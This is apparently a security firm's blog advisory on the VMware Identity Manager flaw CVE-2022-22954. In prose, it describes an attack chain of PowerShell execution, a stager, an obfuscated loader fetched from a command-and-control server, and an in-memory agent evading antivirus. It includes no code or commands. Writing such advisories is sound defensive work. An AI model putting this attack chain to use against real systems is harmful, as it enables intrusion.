If you suspect an active attack on your business, call our emergency hotline at: 612-399-9680
If you suspect an active attack on your business, call our emergency hotline at: 612-399-9680

VMware Backdoor Vulnerability

blog photos (29)

What is the Vulnerability?

The VMware Backdoor vulnerability is labeled CVE-2022-22954. By Exploiting the VMware IDM Service, attackers are able to run powershell to create malicious communications to the server.

How Hackers Gain Access

The adversaries gain initial access to the environment by exploiting CVE-2022-22954, the only one in the RCE trio that doesn’t require administrative access to the target server and also has a publicly available PoC exploit. The attack starts with executing a PowerShell command on the vulnerable service (Identity Manager), which launches a stager. The stager then fetches the PowerTrash loader from the command and control (C2) server in a highly obfuscated form and loads a Core Impact agent into the system memory. With privileged access, these types of attacks may be able to bypass typical defenses including antivirus (AV) and endpoint detection and response (EDR).

Criticalness and Who is Affected

Anyone with VMware and VMware hosted publicly is affected by this vulnerability. For those who host VMware publicly, our cybersecurity experts rate this vulnerability criticalness level an an 8 out of 10. For those who have VMware but it is not hosted publicly, 5 out of 10. For more information visit its page on the National Vulnerability Database.

Facebook
Twitter
LinkedIn
Pinterest